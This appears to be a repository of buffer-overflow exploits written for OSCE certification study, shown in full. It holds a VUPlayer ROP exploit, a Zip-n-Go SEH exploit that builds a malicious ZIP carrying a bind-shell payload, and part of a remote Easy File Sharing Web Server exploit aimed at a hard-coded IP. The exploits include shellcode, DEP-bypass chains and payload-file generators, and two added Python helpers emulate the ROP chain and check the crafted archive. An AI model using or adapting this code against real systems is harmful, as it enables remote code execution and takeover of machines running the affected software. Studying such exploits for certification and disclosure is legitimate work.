shellcode += "\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
shellcode += "\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
shellcode += "\x1c\x80"
buffer = "HTTP://" + "\x41" * 1005
### ROP Chain for VirtualProtect() ###
#========================================#
### stack pivot
buffer += struct.pack('<L', 0x1003a084) # RETN (ROP NOP) [BASS.dll]
### edx = NewProtect (0x40)
buffer += struct.pack('<L', 0x10015f82) # POP EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0xffffffc0) # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x10014db4) # NEG EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10038a6d) # XCHG EAX,EDX # RETN [BASS.dll]
### ebx = dwSize (501)
buffer += struct.pack('<L', 0x10015f82) # POP EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x10014db4) # NEG EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10032f72) # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
### eax = ptr to &VirtualProtect()
buffer += struct.pack('<L', 0x10015f82) # POP EAX # RETN [BASS.dll]
buffer += struct.pack('<L', 0x1060e25c) # ptr to &VirtualProtect() [BASSMIDI.dll]
### ecx = lpOldProtect (ptr to writeable address)
buffer += struct.pack('<L', 0x101049ec) # POP ECX # RETN [BASSWMA.dll]
buffer += struct.pack('<L', 0x101082db) # &Writable location [BASSWMA.dll]
### esp = lpAddress (pushed automatically by PUSHAD; points just past the chain, at the NOP sled and shellcode)
### ebp = return address for VirtualProtect(): POP EBP # RETN skips the saved-EAX slot and returns into the JMP ESP below
buffer += struct.pack('<L', 0x10010157) # POP EBP # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10010157) # skip 4 bytes [BASS.dll]
### esi = ptr to jmp [eax]
buffer += struct.pack('<L', 0x1001d804) # POP ESI # RETN [BASS.dll]
buffer += struct.pack('<L', 0x10101c02) # JMP [EAX] [BASSWMA.dll]
### edi = ROP NOP (RETN)
buffer += struct.pack('<L', 0x100190b0) # POP EDI # RETN [BASS.dll]
buffer += struct.pack('<L', 0x1003a084) # RETN (ROP NOP) [BASS.dll]
### PUSHAD pushes EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI; the RETN then consumes EDI (ROP NOP) and ESI (JMP [EAX]), which calls VirtualProtect() with EBP/ESP/EBX/EDX/ECX as its return address and arguments
buffer += struct.pack('<L', 0x1001d7a5) # PUSHAD # RETN [BASS.dll]
buffer += struct.pack('<L', 0x1010539f) # jmp esp in BASSWMA.dll universal
buffer += "\x90" * 20 # make space for shellcode decoder
buffer += shellcode # evil calc.exe
### padding
buffer += "\x43" * (20000-7-1005-(4*21)-20-len(shellcode))
try:
    f=open("OpenMe.m3u","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    time.sleep(1)
    f.write(buffer)
    f.close()
    print "[+] File created. Load that shit up!"
except:
    print "File cannot be created"
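The comments in the chain above say which register carries which VirtualProtect() argument, but the reason it works is the order PUSHAD writes registers to the stack (EAX, ECX, EDX, EBX, original ESP, EBP, ESI, EDI, so EDI ends up at the lowest address) and the fact that a stdcall callee pops its own arguments. The following is an added example, not code from the repository: a small emulator that walks the 21 dwords of the VUPlayer chain with the gadget semantics taken from the comments above and reports the VirtualProtect() frame that results. The stack base address and the value inside the BASSMIDI.dll IAT slot are constructed assumptions; only the chain itself and the gadget mnemonics come from the exploit.

```python
# Constructed assumptions: where the first chain dword (the overwritten return
# address) sits on the stack, and what the IAT slot JMP [EAX] dereferences holds.
STACK_BASE = 0x0012f000
VIRTUALPROTECT = 0x7c801ad4

# Gadget semantics as commented in the VUPlayer exploit (address -> mnemonic).
GADGETS = {
    0x1003a084: "RETN",
    0x10015f82: "POP EAX # RETN",
    0x10014db4: "NEG EAX # RETN",
    0x10038a6d: "XCHG EAX,EDX # RETN",
    0x10032f72: "XCHG EAX,EBX # RETN",
    0x101049ec: "POP ECX # RETN",
    0x10010157: "POP EBP # RETN",
    0x1001d804: "POP ESI # RETN",
    0x100190b0: "POP EDI # RETN",
    0x1001d7a5: "PUSHAD # RETN",
    0x10101c02: "JMP [EAX]",
    0x1010539f: "JMP ESP",
}

# The 21 dwords the exploit writes after "HTTP://" + 1005 bytes of filler.
CHAIN = [0x1003a084,
         0x10015f82, 0xffffffc0, 0x10014db4, 0x10038a6d,   # edx = 0x40
         0x10015f82, 0xfffffaff, 0x10014db4, 0x10032f72,   # ebx = 0x501
         0x10015f82, 0x1060e25c,                           # eax = &VirtualProtect IAT slot
         0x101049ec, 0x101082db,                           # ecx = writable dword
         0x10010157, 0x10010157,                           # ebp = POP EBP # RETN
         0x1001d804, 0x10101c02,                           # esi = JMP [EAX]
         0x100190b0, 0x1003a084,                           # edi = RETN
         0x1001d7a5,                                       # PUSHAD # RETN
         0x1010539f]                                       # JMP ESP (reached after the call)


def emulate(chain=CHAIN, base=STACK_BASE):
    """Start from the first RETN with ESP at `base` and run until JMP ESP.
    Returns the VirtualProtect() argument block and the address JMP ESP lands on."""
    mem = {base + 4 * i: d for i, d in enumerate(chain)}
    mem[0x1060e25c] = VIRTUALPROTECT          # IAT slot read by JMP [EAX]
    r = dict(eax=0, ecx=0, edx=0, ebx=0, esp=base, ebp=0, esi=0, edi=0)
    call = None

    def pop():
        v = mem[r["esp"]]
        r["esp"] += 4
        return v

    def push(v):
        r["esp"] -= 4
        mem[r["esp"]] = v & 0xffffffff

    eip = pop()                               # the overwritten return address
    while True:
        if eip == VIRTUALPROTECT:             # stdcall stub: read 4 args, pop them, return
            ret = pop()
            call = dict(lpAddress=pop(), dwSize=pop(),
                        flNewProtect=pop(), lpflOldProtect=pop())
            eip = ret
            continue
        g = GADGETS[eip]
        if g == "JMP ESP":
            return call, r["esp"]
        if g == "JMP [EAX]":
            eip = mem[r["eax"]]
            continue
        if g.startswith("POP "):
            r[g[4:7].lower()] = pop()
        elif g.startswith("NEG "):
            r["eax"] = (-r["eax"]) & 0xffffffff
        elif g.startswith("XCHG "):
            other = g.split(",")[1].split()[0].lower()
            r["eax"], r[other] = r[other], r["eax"]
        elif g.startswith("PUSHAD"):
            orig_esp = r["esp"]               # PUSHAD stores the pre-push ESP
            for v in (r["eax"], r["ecx"], r["edx"], r["ebx"],
                      orig_esp, r["ebp"], r["esi"], r["edi"]):
                push(v)
        eip = pop()                           # every gadget ends in RETN


if __name__ == "__main__":
    args, landing = emulate()
    for name, value in args.items():
        print("%-14s = 0x%08x" % (name, value))
    print("JMP ESP lands at 0x%08x (chain base + %d)" % (landing, landing - STACK_BASE))
```

Run it and the frame reads flNewProtect=0x40, dwSize=0x501, lpflOldProtect=0x101082db and lpAddress four bytes below the NOP sled, which is why the 0x501-byte region covers the 20 NOPs and the 227-byte payload. Swapping any two gadgets in the register-setup section changes which slot PUSHAD writes where, and the emulator shows the resulting frame immediately.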
================================================
FILE: Local Buffer Overflow/VUPlayerv2.49/readme.md
================================================
### VUPlayer v2.49
ROP chain exploit to pop calc.exe by bypassing DEP protection on Windows XP SP3 using Windows VirtualProtect() API.

================================================
FILE: Local Buffer Overflow/Zip-n-Gov4.9/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : Zip-n-Go v4.9 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://mc1soft.com/index.shtml #
# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#
# Disclosure Timeline:
# ====================
# 05-28-18: Contacted vendor, no response
# 05-30-18: Contacted vendor again, responded with patch and requested further testing
# 05-30-18: Patch did not seem to fix the problem and an alternative approach was suggested
# 05-31-18: Vendor applied new patch and requested further testing
# 05-31-18: The new patch nullified the vulnerability
# 06-03-18: Version 4.95 was released
# 06-03-18: Proof of concept exploit published
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
#Payload size: 710 bytes
shellcode = ""
shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6e\x62\x43\x30"
shellcode += "\x45\x50\x73\x30\x61\x70\x6d\x59\x7a\x45\x46\x51"
shellcode += "\x39\x50\x72\x44\x4e\x6b\x52\x70\x30\x30\x6c\x4b"
shellcode += "\x52\x72\x56\x6c\x6c\x4b\x73\x62\x37\x64\x4c\x4b"
shellcode += "\x32\x52\x51\x38\x54\x4f\x6f\x47\x31\x5a\x61\x36"
shellcode += "\x50\x31\x79\x6f\x4c\x6c\x35\x6c\x31\x71\x51\x6c"
shellcode += "\x47\x72\x46\x4c\x71\x30\x59\x51\x5a\x6f\x44\x4d"
shellcode += "\x56\x61\x6b\x77\x38\x62\x69\x62\x72\x72\x43\x67"
shellcode += "\x6e\x6b\x43\x62\x32\x30\x6c\x4b\x33\x7a\x55\x6c"
shellcode += "\x6c\x4b\x32\x6c\x34\x51\x34\x38\x6d\x33\x37\x38"
shellcode += "\x57\x71\x4a\x71\x66\x31\x6c\x4b\x42\x79\x51\x30"
shellcode += "\x65\x51\x59\x43\x4c\x4b\x52\x69\x45\x48\x6b\x53"
shellcode += "\x77\x4a\x47\x39\x4e\x6b\x76\x54\x4e\x6b\x46\x61"
shellcode += "\x58\x56\x36\x51\x59\x6f\x6e\x4c\x49\x51\x4a\x6f"
shellcode += "\x76\x6d\x35\x51\x68\x47\x57\x48\x49\x70\x62\x55"
shellcode += "\x48\x76\x56\x63\x31\x6d\x4a\x58\x55\x6b\x73\x4d"
shellcode += "\x35\x74\x33\x45\x4b\x54\x52\x78\x6c\x4b\x46\x38"
shellcode += "\x51\x34\x56\x61\x59\x43\x33\x56\x6c\x4b\x76\x6c"
shellcode += "\x50\x4b\x4e\x6b\x46\x38\x75\x4c\x67\x71\x68\x53"
shellcode += "\x6c\x4b\x34\x44\x4e\x6b\x47\x71\x78\x50\x4b\x39"
shellcode += "\x47\x34\x57\x54\x55\x74\x33\x6b\x33\x6b\x55\x31"
shellcode += "\x31\x49\x50\x5a\x42\x71\x4b\x4f\x4b\x50\x31\x4f"
shellcode += "\x31\x4f\x72\x7a\x4c\x4b\x54\x52\x6a\x4b\x6c\x4d"
shellcode += "\x31\x4d\x62\x48\x46\x53\x50\x32\x77\x70\x43\x30"
shellcode += "\x72\x48\x70\x77\x30\x73\x35\x62\x43\x6f\x50\x54"
shellcode += "\x70\x68\x72\x6c\x71\x67\x67\x56\x47\x77\x49\x6f"
shellcode += "\x68\x55\x6e\x58\x4c\x50\x43\x31\x45\x50\x53\x30"
shellcode += "\x46\x49\x78\x44\x33\x64\x62\x70\x50\x68\x76\x49"
shellcode += "\x4f\x70\x42\x4b\x43\x30\x69\x6f\x69\x45\x73\x5a"
shellcode += "\x67\x78\x31\x49\x42\x70\x6a\x42\x59\x6d\x71\x50"
shellcode += "\x32\x70\x73\x70\x36\x30\x70\x68\x78\x6a\x36\x6f"
shellcode += "\x69\x4f\x6d\x30\x6b\x4f\x69\x45\x4f\x67\x63\x58"
shellcode += "\x47\x72\x47\x70\x36\x71\x31\x4c\x6c\x49\x59\x76"
shellcode += "\x70\x6a\x74\x50\x31\x46\x61\x47\x45\x38\x4f\x32"
shellcode += "\x69\x4b\x54\x77\x35\x37\x79\x6f\x6a\x75\x66\x37"
shellcode += "\x51\x78\x4d\x67\x39\x79\x37\x48\x59\x6f\x39\x6f"
shellcode += "\x6a\x75\x62\x77\x61\x78\x43\x44\x68\x6c\x37\x4b"
shellcode += "\x68\x61\x69\x6f\x4a\x75\x70\x57\x5a\x37\x52\x48"
shellcode += "\x74\x35\x32\x4e\x52\x6d\x45\x31\x39\x6f\x4a\x75"
shellcode += "\x71\x78\x71\x73\x30\x6d\x32\x44\x65\x50\x4f\x79"
shellcode += "\x69\x73\x36\x37\x32\x77\x36\x37\x70\x31\x7a\x56"
shellcode += "\x51\x7a\x56\x72\x53\x69\x36\x36\x7a\x42\x49\x6d"
shellcode += "\x43\x56\x78\x47\x33\x74\x31\x34\x37\x4c\x67\x71"
shellcode += "\x46\x61\x6e\x6d\x53\x74\x34\x64\x62\x30\x6a\x66"
shellcode += "\x65\x50\x71\x54\x66\x34\x52\x70\x72\x76\x36\x36"
shellcode += "\x32\x76\x31\x56\x70\x56\x30\x4e\x53\x66\x52\x76"
shellcode += "\x31\x43\x32\x76\x52\x48\x64\x39\x38\x4c\x65\x6f"
shellcode += "\x4f\x76\x49\x6f\x78\x55\x4b\x39\x49\x70\x50\x4e"
shellcode += "\x53\x66\x31\x56\x79\x6f\x34\x70\x50\x68\x65\x58"
shellcode += "\x4e\x67\x57\x6d\x63\x50\x79\x6f\x38\x55\x4d\x6b"
shellcode += "\x68\x70\x78\x35\x6d\x72\x62\x76\x72\x48\x6d\x76"
shellcode += "\x4d\x45\x6f\x4d\x4f\x6d\x39\x6f\x4b\x65\x37\x4c"
shellcode += "\x77\x76\x71\x6c\x46\x6a\x6f\x70\x39\x6b\x4d\x30"
shellcode += "\x74\x35\x33\x35\x6f\x4b\x61\x57\x77\x63\x52\x52"
shellcode += "\x50\x6f\x32\x4a\x73\x30\x32\x73\x6b\x4f\x78\x55"
shellcode += "\x41\x41"
####################### ZIP File Structure ########################
###################################################################
######################## Local File Header ########################
LocalFileHeader = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00' # general purpose bit flag
LocalFileHeader += '\x00\x00' # compression method
LocalFileHeader += '\xb7\xac' # file last modification time 0xacb7 (MS-DOS packed: H=21 M=37 S=23*2=46) -> 21:37:46
LocalFileHeader += '\xce\x34' # file last modification date 0x34ce (MS-DOS packed: Y=1980+26=2006 M=6 D=14) -> 2006/6/14
LocalFileHeader += '\x00\x00\x00' # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
LocalFileHeader += '\x00\x00' # extra field length
LocalFileHeader += '\x00' # file name
#LocalFileHeader += '\x00' # extra filed
################## Central Directory File Header ##################
CDFileHeader = '\x50\x4b\x01\x02' # cd file header signature
CDFileHeader += '\x14\x00' # version made by 0x14 = 20 -> 2.0
CDFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader += '\x00\x00' # general purpose bit flag
CDFileHeader += '\x00\x00' # compression method
CDFileHeader += '\xb7\xac' # file last modification time 0xacb7 (MS-DOS packed: H=21 M=37 S=23*2=46) -> 21:37:46
CDFileHeader += '\xce\x34' # file last modification date 0x34ce (MS-DOS packed: Y=1980+26=2006 M=6 D=14) -> 2006/6/14
CDFileHeader += '\x00\x00\x00\x00' # CRC-32
CDFileHeader += '\x00\x00\x00\x00' # compressed size
CDFileHeader += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
CDFileHeader += '\x00\x00' # extra field length
CDFileHeader += '\x00\x00' # file comment length
CDFileHeader += '\x00\x00' # disk number where file starts
CDFileHeader += '\x01\x00' # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader += '\x24\x00\x00\x00' # external file attributes
CDFileHeader += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader += '\x00' # file name
#CDFileHeader += '\x00' # extra field
#CDFileHeader += '\x00' # file comment
################ End of Central Directory Record ##################
EOCDRHeader = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader += '\x00\x00' # number of this disk
EOCDRHeader += '\x00\x00' # disk where central directory starts
EOCDRHeader += '\x01\x00' # number of central directory records on this disk
EOCDRHeader += '\x01\x00' # total number of central directory records
EOCDRHeader += '\x12\x10\x00\x00' # size of central directory 0x1012 = 4114 bytes
EOCDRHeader += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive
EOCDRHeader += '\x00\x00' # comment length
#EOCDRHeader += '\x00' # comment
Witchcraft = '\x54' # PUSH ESP * save stack pointer
Witchcraft += '\x5F' # POP EDI
Witchcraft += '\x54' # PUSH ESP * calculate offset for decoder
Witchcraft += '\x58' # POP EAX
Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111
Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111
Witchcraft += '\x2D\x53\x25\x22\x22' # SUB EAX,22222553
Witchcraft += '\x50' # PUSH EAX
Witchcraft += '\x5C' # POP ESP
#https://github.com/ihack4falafel/Slink
#root@kali:/opt/Slink# python Slink.py * input to encode (the decoder rebuilds it on the stack): 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'
#Enter your shellcode: 9089FC89F8058C050000FFE0
#[+] Shellcode size is divisible by 4
#[+] Encoding [e0ff0000]..
#[!] [01] and/or [f] and/or [00] found, using alternative encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x11\x11\x77\x61" ## add eax, 0x61771111
Witchcraft += "\x05\x11\x11\x66\x51" ## add eax, 0x51661111
Witchcraft += "\x05\x11\x11\x55\x61" ## add eax, 0x61551111
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
#[+] Encoding [058c05f8]..
#[!] [01] and/or [f] and/or [00] found, using alternative encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x74\x13\x46\x13" ## add eax, 0x13461374
Witchcraft += "\x05\x64\x13\x45\x13" ## add eax, 0x13451364
Witchcraft += "\x05\x53\x12\x34\x12" ## add eax, 0x12341253
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
#[+] Encoding [89fc8990]..
#[!] [01] and/or [f] and/or [00] found, using alternative encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x41\x44\x76\x44" ## add eax, 0x44764441
Witchcraft += "\x05\x41\x44\x65\x44" ## add eax, 0x44654441
Witchcraft += "\x05\x41\x34\x54\x34" ## add eax, 0x34543441
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
Evil = '\x41' * 3066 # offset to shellcode
Evil += shellcode # bind shell
Evil += '\x43' * (716-len(shellcode)) # shellcode host
Evil += Witchcraft # magic!
Evil += '\x42' * (126-len(Witchcraft)) # witchcraft host
Evil += '\x74\x80\x75\x80' # nSEH - JE SHORT -0x80 / JNE SHORT -0x80: one of the pair is always taken, a 128-byte jump back toward the witchcraft
Evil += '\x6e\x4c\x40\x00' # SEH - pop ecx, pop ebp, retn in zip-n-go.exe
Evil += '\x41' * (4064-3908-4-4)
Evil += '.txt'
buffer = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader
try:
    f=open("Evil.zip","w")
    print "[+] Creating %s bytes evil payload.." %len(Evil)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except Exception as e:
    print e
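The header bytes above are hand-assembled, and the interesting trick is the local file header whose CRC-32 field is three bytes instead of four: every field after it is shifted one byte earlier than the specification places it, while the central directory entry is laid out correctly. The following is an added example, not code from the repository: it rebuilds the same three records with named struct fields (the 4068-byte "file name" is constructed filler in place of the shellcode), then parses the result the way a specification-following ZIP reader would, so that the central directory offset and size, the two name-length fields and the packed MS-DOS timestamp can be cross-checked before a crafted archive is handed to a target. The format strings and offsets follow the PKWARE APPNOTE layout; nothing here depends on how Zip-n-Go itself parses the file.

```python
import struct

LFH_FMT = "<4sHHHHHIIIHH"        # local file header, 30 bytes (spec layout)
CDH_FMT = "<4sHHHHHHIIIHHHHHII"  # central directory header, 46 bytes
EOCD_FMT = "<4sHHHHIIH"          # end of central directory record, 22 bytes


def dos_datetime(time_field, date_field):
    """Decode the packed MS-DOS time/date stored in ZIP headers."""
    seconds = (time_field & 0x1f) * 2            # stored in 2-second units
    minute = (time_field >> 5) & 0x3f
    hour = time_field >> 11
    day = date_field & 0x1f
    month = (date_field >> 5) & 0x0f
    year = 1980 + (date_field >> 9)
    return (year, month, day, hour, minute, seconds)


def build_poc(name_len=4068, payload=None):
    """Rebuild the exploit's archive shape: a 30-byte local header with a
    3-byte CRC field (so everything after it is skewed by one byte), a
    spec-conformant central directory entry, and an EOCD record.
    `payload` stands in for the oversized file name (constructed filler)."""
    if payload is None:
        payload = b"A" * name_len
    assert len(payload) == name_len
    lfh = (b"PK\x03\x04"
           + struct.pack("<HHHHH", 20, 0, 0, 0xacb7, 0x34ce)   # ver, flag, comp, time, date
           + b"\x00\x00\x00"                                   # 3-byte CRC, as in the exploit
           + struct.pack("<IIHH", 0, 0, name_len, 0)           # csize, usize, name len, extra len
           + b"\x00")                                          # byte 30, filling the header
    cdh = struct.pack(CDH_FMT, b"PK\x01\x02", 20, 20, 0, 0, 0xacb7, 0x34ce,
                      0, 0, 0, name_len, 0, 0, 0, 1, 0x24, 0)
    cd_offset = len(lfh) + len(payload)
    cd_size = len(cdh) + len(payload)
    eocd = struct.pack(EOCD_FMT, b"PK\x05\x06", 0, 0, 1, 1, cd_size, cd_offset, 0)
    return lfh + payload + cdh + payload + eocd


def audit(zip_bytes):
    """Walk EOCD -> central directory -> local header by the spec offsets and
    return the values a crafted archive needs to agree on."""
    eocd_at = zip_bytes.rfind(b"PK\x05\x06")
    (_, _, _, _, entries, cd_size, cd_offset, _) = struct.unpack_from(
        EOCD_FMT, zip_bytes, eocd_at)
    cd = struct.unpack_from(CDH_FMT, zip_bytes, cd_offset)
    lfh = struct.unpack_from(LFH_FMT, zip_bytes, cd[16])      # cd[16] = local header offset
    return {
        "entries": entries,
        "cd_offset": cd_offset,
        "cd_size": cd_size,
        "cd_size_ok": eocd_at - cd_offset == cd_size,
        "cd_sig_ok": cd[0] == b"PK\x01\x02",
        "lfh_sig_ok": lfh[0] == b"PK\x03\x04",
        "cd_name_len": cd[10],
        "lfh_name_len": lfh[9],      # read at spec offset 26: skewed by the short CRC
        "mtime": dos_datetime(cd[5], cd[6]),
    }


if __name__ == "__main__":
    archive = build_poc()
    for key, value in audit(archive).items():
        print("%-13s %r" % (key, value))
```

Against the page's layout the audit confirms cd_offset 0x1002 and cd_size 0x1012 match the real byte positions, and the timestamp decodes to 2006-06-14 21:37:46. It also shows the effect of the shortened CRC: a spec reader sees a local-header name length of 15, not 4068, so the 4068 has to be honoured through the central directory entry (or through the target's own off-by-one read) for the long name to reach the vulnerable copy. That is the kind of discrepancy to check first when a malformed-archive exploit fails to trigger on a different parser.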
================================================
FILE: Local Buffer Overflow/Zip-n-Gov4.9/README.md
================================================
### Zip-n-Go v4.9
Structured Exception Handler (SEH) overwrite exploit found while studying about ZIP file headers. See the link [EDB-ID: 44828](https://www.exploit-db.com/exploits/44828/)
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/Zip-n-Gov4.9/PoC.gif">
</p>
================================================
FILE: README.md
================================================
# OSCE
Some of the sploits and tools made during my journey to take on OSCE. Mostly useless..
<p align="center">
<img height=500 width=900 src="https://media.giphy.com/media/Uno27COfoYlH2/giphy.gif">
</p>
<p align="center">
With persistence and patience comes success
</p>
================================================
FILE: Remote Buffer Overflow/EasyFileSharingWebServerv7.2/Exploit.py
================================================
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------#
# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #
# Date : 04/24/2018 #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sharing-file.com/ #
# Software Link : http://www.sharing-file.com/efssetup.exe #
# Original Exploit: https://www.exploit-db.com/exploits/44485/ #
# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 #
#---------------------------------------------------------------------------------------------------#
import requests
import struct
import time
host='192.168.80.148'
port='80'
# badchars = "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
# Payload size: 447 bytes
shellcode = ""
shellcode += "\x89\xe3\xd9\xe5\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
shellcode += "\x6c\x6b\x58\x4e\x62\x63\x30\x57\x70\x77\x70\x53"
shellcode += "\x50\x6e\x69\x6b\x55\x64\x71\x39\x50\x50\x64\x6e"
shellcode += "\x6b\x42\x70\x64\x70\x6c\x4b\x43\x62\x36\x6c\x6e"
shellcode += "\x6b\x43\x62\x75\x44\x6e\x6b\x52\x52\x64\x68\x46"
shellcode += "\x6f\x38\x37\x50\x4a\x76\x46\x64\x71\x4b\x4f\x4e"
shellcode += "\x4c\x77\x4c\x35\x31\x61\x6c\x77\x72\x76\x4c\x37"
shellcode += "\x50\x4a\x61\x5a\x6f\x74\x4d\x37\x71\x39\x57\x38"
shellcode += "\x62\x5a\x52\x30\x52\x66\x37\x6e\x6b\x50\x52\x62"
shellcode += "\x30\x6c\x4b\x62\x6a\x57\x4c\x6c\x4b\x52\x6c\x47"
shellcode += "\x61\x74\x38\x6d\x33\x71\x58\x43\x31\x38\x51\x50"
shellcode += "\x51\x6c\x4b\x33\x69\x67\x50\x35\x51\x48\x53\x6e"
shellcode += "\x6b\x57\x39\x75\x48\x69\x73\x54\x7a\x63\x79\x4e"
shellcode += "\x6b\x35\x64\x6c\x4b\x35\x51\x6a\x76\x46\x51\x39"
shellcode += "\x6f\x6e\x4c\x6f\x31\x48\x4f\x44\x4d\x36\x61\x48"
shellcode += "\x47\x34\x78\x6b\x50\x74\x35\x69\x66\x73\x33\x73"
shellcode += "\x4d\x49\x68\x55\x6b\x43\x4d\x47\x54\x74\x35\x68"
shellcode += "\x64\x63\x68\x4e\x6b\x46\x38\x66\x44\x33\x31\x59"
shellcode += "\x43\x61\x76\x6c\x4b\x66\x6c\x50\x4b\x4c\x4b\x50"
shellcode += "\x58\x47\x6c\x65\x51\x69\x43\x6c\x4b\x63\x34\x6e"
shellcode += "\x6b\x43\x31\x68\x50\x4e\x69\x61\x54\x65\x74\x65"
shellcode += "\x74\x51\x4b\x51\x4b\x73\x51\x73\x69\x62\x7a\x42"
shellcode += "\x71\x69\x6f\x39\x70\x51\x4f\x73\x6f\x43\x6a\x4e"
shellcode += "\x6b\x52\x32\x78\x6b\x4e\x6d\x31\x4d\x53\x5a\x67"
shellcode += "\x71\x6c\x4d\x4f\x75\x48\x32\x57\x70\x77\x70\x43"
shellcode += "\x30\x66\x30\x61\x78\x46\x51\x6e\x6b\x70\x6f\x6e"
shellcode += "\x67\x59\x6f\x6b\x65\x4f\x4b\x78\x70\x6d\x65\x39"
shellcode += "\x32\x50\x56\x73\x58\x6c\x66\x6c\x55\x4d\x6d\x6d"
shellcode += "\x4d\x49\x6f\x49\x45\x65\x6c\x45\x56\x73\x4c\x45"
shellcode += "\x5a\x6b\x30\x6b\x4b\x39\x70\x53\x45\x34\x45\x4d"
shellcode += "\x6b\x42\x67\x65\x43\x63\x42\x70\x6f\x50\x6a\x37"
shellcode += "\x70\x66\x33\x6b\x4f\x69\x45\x30\x63\x35\x31\x72"
shellcode += "\x4c\x65\x33\x76\x4e\x75\x35\x42\x58\x45\x35\x67"
shellcode += "\x70\x41\x41"
# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]
buffer = '\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget)
# mona.py VirtualProtect() ROP template with few modifications
# ESI = ptr to VirtualProtect()
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c832d0) # ptr to &VirtualProtect() [IAT sqlite3.dll]
buffer += struct.pack('<L', 0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c18d81) # XCHG EAX,EDI # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x1001d626) # XOR ESI,ESI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x10021a3e) # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
# EBP = ReturnTo (ptr to jmp esp)
buffer += struct.pack('<L', 0x1001add7) # POP EBP # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c24169) # & push esp # ret [sqlite3.dll]
